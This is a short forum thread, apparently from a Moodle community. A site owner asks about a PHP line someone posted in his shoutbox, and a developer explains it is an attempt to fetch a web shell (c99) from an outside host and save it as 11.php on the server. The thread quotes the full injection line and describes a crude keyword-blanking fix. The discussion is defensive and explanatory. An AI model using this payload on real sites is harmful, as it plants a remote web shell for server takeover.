Some joker posted this in my shoutbox on my homepage. What's he trying to do???

Some joker posted this in my shoutbox on my homepage. What's he trying to do???

by Frankie Kam -
Number of replies: 2
Picture of Plugin developers

Here's the code:

<? $z=fopen("11.php",'w');fwrite($z,file_get_contents("http://t00ls.org/c99.txt"));fclose($z); ?> (Tuesday, 10.05.11, 03:47 AM)

 

What was he trying to accomplish?

 

Frankie Kam

Average of ratings: -
In reply to Frankie Kam

Re: Some joker posted this in my shoutbox on my homepage. What's he trying to do???

by Tim Hunt -
Picture of Core developers Picture of Documentation writers Picture of Particularly helpful Moodlers Picture of Peer reviewers Picture of Plugin developers

He is trying to download a trojan to you server, so that later he can go to the URL .../11.php to execute malicious stuff. However, that sort of thing will not work, providing you are no using a badly-implemented plugin that has security holes.

Average of ratings: -
In reply to Tim Hunt

Re: Some joker posted this in my shoutbox on my homepage. What's he trying to do???

by Frankie Kam -
Picture of Plugin developers

Thanks Tim

Now I know what his intentions are,

This time, I took evasive action. Since I don't know how to stop him from posting such code, I modified the php core code of the Shoutbox so that it will replace substring text with blanks. So fopen, is replaced for blanks, for example.

Frankie Kam

Average of ratings: -